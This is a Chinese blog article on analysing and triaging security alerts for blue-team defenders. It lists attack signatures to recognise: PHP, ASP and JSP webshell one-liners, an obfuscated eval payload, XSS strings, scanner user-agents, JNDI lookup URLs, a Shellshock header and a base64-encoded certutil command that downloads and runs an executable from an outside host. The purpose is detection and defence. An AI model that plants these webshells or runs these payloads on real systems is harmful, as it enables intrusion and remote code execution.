前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >威胁事件告警分析技巧及处置(二)

威胁事件告警分析技巧及处置(二)

作者头像
安全小王子
发布2020-09-23 14:33:18
2.2K0
发布2020-09-23 14:33:18
举报
文章被收录于专栏:betasecbetasec

声明:公众号大部分文章来自团队核心成员和知识星球成员,少部分文章经过原作者授权和其它公众号白名单转载。未经授权,严禁转载,如需转载,请联系开白!

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者及本公众号无关!!!

START

0x01前言

由于近几年信息安全人员紧缺,面临HW急需安全人员的竞赛中,许多安全厂商降低招聘要求,招收大量安全工作经验较少的人员参与HW当中,由于缺乏相应的工作经验,面对攻击团队的频繁入侵,导致误判、错封攻击源IP地址,进而对公司业务造成严重影响。小编对此对攻击流特征进行了一个详细的总结,本文适用于可查看攻击数据流量的设备,如:waf、ids、ips、天眼、睿眼以及其他全流量分析系统等。

0x02期望效果

看完本文后,您能学到:

>常见告警攻击特征识别

> 低危告警攻击事件忽略

> 研判告警攻击是否误报

> 复杂告警攻击Pcap取证

> 验证告警攻击是否成功

0x03webshell后门特征

webshell后门包含但不限于以下:

代码语言:javascript
复制
<%eval request("pass")%>
<%eval(Request.Item["pass"],"unsafe");%>
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
 <?php @eval($_POST["pass"]);?>
e'.'v'.'a'.'l(gz'.'inf'.'lat'.'e(bas'.'e64_'.'deco'.'de(\'7P35d1zXdSeK/0yv5f/hqgyrAKsA3nkgBFp3lChxMkFqJB9eASiAJQIoGFXgIIp/jJPuFz13esWSNdiWZMWSbMnyIFmSZccr6U7c6XSn9dyvM3QmJ72+n88+9966twYQlO3kZX0bEoGqe8989tnz3qe3utIftPcGs3OLn/7Uemeju9OZbW7faK+v73X6/WZrZmU5Pfdweu6J5nJ87sTZ8yvZiZPp6fBU2rxUrdHZubq125YK/HOtt7defd2/3Nna2mlvd/C+/FzvcX9vCy/lL190N2bv2+wMVrbbm921lS/u9wad/srm7trs3NzNT3/qyEZvr9Neuzw7s3L2zPJ5rd3XZq5oS8e1matzmnr2xMyVS9qS1h/sdXf7W2302p/F28Va5fvTsbp4NL3qLRlYt9/vDFD7XPqFCyl6KiZ/ScZ2eXurt9ndmTVZ4b7O1fbWxKJ42bneHSyqJmdW4jNnHjqRPjFcyUvaXUva9rozWzxRM5fCMsFKUXkz+ZW2tKS
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVq8qLc5IzUtXj9W0BgA=')));
/xxx.aspx;(1).jpg、test.asp;1.jpg
/xxx.jpg/xxx.php
/xxx.php [;][%00][%81].jpg
/xxx.cer
*.asa
xxx.php.owf.rar

0x04跨站脚本攻击特征

跨站脚本攻击包含但不限于以下:

代码语言:javascript
复制
 </script>"><script>prompt(1)</script>
"><img src=x onerror=prompt(1)>
"><svg/onload=prompt(1)>
"><iframe/src=javascript:prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><textarea autofocus onfocus=prompt(1)>
<DEFANGED_SCRIPT>alert(document.domain)</DEFANGED_SCRIPT>
onload=window.open("http://www.google.com")
<script>alert("XSS")<%2Fscript>
'-alert(123)-

0x05漏洞扫描特征

扫描器扫描行为特征包含但不限于以下:

代码语言:javascript
复制
 awvs
 Acunetix-Aspect
 by_wvs
/acunetix-wvs-test-for-some-inexistent-file
 acunetix_wvs_security_test
 netsparker
 Appscan
 nessus
 sqlmap
 nmap
 masscan

0x06wireshark pcap包分析

wireshark pcap分析主要的就是熟悉基本的筛选,以及很重要的是追踪流,推荐是TCP流或UDP流,这些能进行切换,如果是HTTP流可能不方便看下面的几个数据流。

0x07请求行为分析

请求行为分析包含但不限于以下这些:

代码语言:javascript
复制
正常行为:

SQL注入如果只有where 1=1,其余字段无异常,或者有中文、真实字段,那么可能是误报。

跨站脚本攻击中,如只有js或者css代码,无明显攻击特征行为,那么可能是误报。

代码语言:javascript
复制
异常行为:
代码语言:javascript
复制
     User-Agent
代码语言:javascript
复制
     X-Forwarded-For

Accept-Charset:base 编码内容如:

(c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vZmsub3BlbnlvdXJhc3MuY2x1Yi9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvbWd3bHR1emx2eWxpcGJhOTkzNC5leGUgJiAlU3lzdGVtUm9vdCUvVGVtcC9tZ3dsdHV6bHZ5bGlwYmE5OTM0LmV4ZScpO2VjaG8gbWQ1KCdwaHBzdHVkeScpOw==)

代码语言:javascript
复制
异常外部URL:
代码语言:javascript
复制
      rmi://fastjson_rcenlbODRGW.awvsscan119.autoverify.cn/poc,                              
代码语言:javascript
复制
     ldap://xx.xx.xx.xx/
代码语言:javascript
复制
异常HTTP传输行为:
代码语言:javascript
复制
      PUT /FxCodeShell.jsp/,
代码语言:javascript
复制
      PUT /FxCodeShell.jsp::$DATA
代码语言:javascript
复制
异常HTTP header行为:
代码语言:javascript
复制
       Range: bytes=0-18446744073709551615
代码语言:javascript
复制
     Bad-Bash: () { :; }; echo echo Bad-Bash: tznupowcysf;
代码语言:javascript
复制
异常HTTP主体内容行为:

<soapenv:Envelope xmlns:soapenv=xxxxxxxxxxx 需结合业务系统情况进行分析,如果里面有cmd bash等命令执行特征则不是误报!

0x08攻击成功判断

对确认为真实攻击的行为需要进行研判,是否攻击成功,主要是通过以下方式但不限于进行:

  • 基于流量payload信息判断攻击成功与否。例如web攻击,如果响应码为4XX,则多数可以判定为失败,但是为200的不一定就是成功,还需要结合响应主体进行判断。另外如果使用目录遍历读取/etc/passwd,且响应包里面有这些特征可判断为攻击成功.
  • root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  • 基于攻击告警和行为审计日志判断攻击成功与否。例如产生了暴力破解告警,同时发现相关的登录成功告警,则攻击成功。
  • 基于不同告警日志的关联判断攻击成功与否。例如产生了永恒之蓝漏洞利用的告警,同时发现漏洞利用成功的反连行为的告警,则说明永恒之蓝漏洞利用成功;或者产生了redis未授权写ssh密钥的行为,且后面有登录ssh的行为也基本可判断为攻击成功,但是具体与否还需要登录服务器进行查看,毕竟ssh也是加密传输的!

0x08常见编码

在监测过程中会遇到很多编码,对于特征不能一目了然,那么需要熟悉对应的编码或加密方式并进行转换和解码,常见编码包含但不限于以下这些:

代码语言:javascript
复制
URL:
代码语言:javascript
复制
%xx: %3Cscript%3Ealert%28123%29%3C/script%3E

解码网站:

http://tool.chinaz.com/tools/urlencode.aspx

实体化编码:

代码语言:javascript
复制
代码语言:javascript
复制
 &#x:&#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;     
 &#:&#60;&#115;&#99;&#114;&#105;&#112;     、
 &lt;script&gt;alert(123)&lt;/script&gt;
代码语言:javascript
复制
代码语言:javascript
复制
base64:
代码语言:javascript
复制
=:MTIzNDU2Nw==

解码网站

http://tool.chinaz.com/Tools/Base64.aspx

Unicode编码

代码语言:javascript
复制
 \u:\u0031\u0032\u0033\u0034\u0035\u0036

解码网站:

http://tool.chinaz.com/tools/unicode.aspx

代码语言:javascript
复制

END

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-09-18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 betasec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
脆弱性检测服务
脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档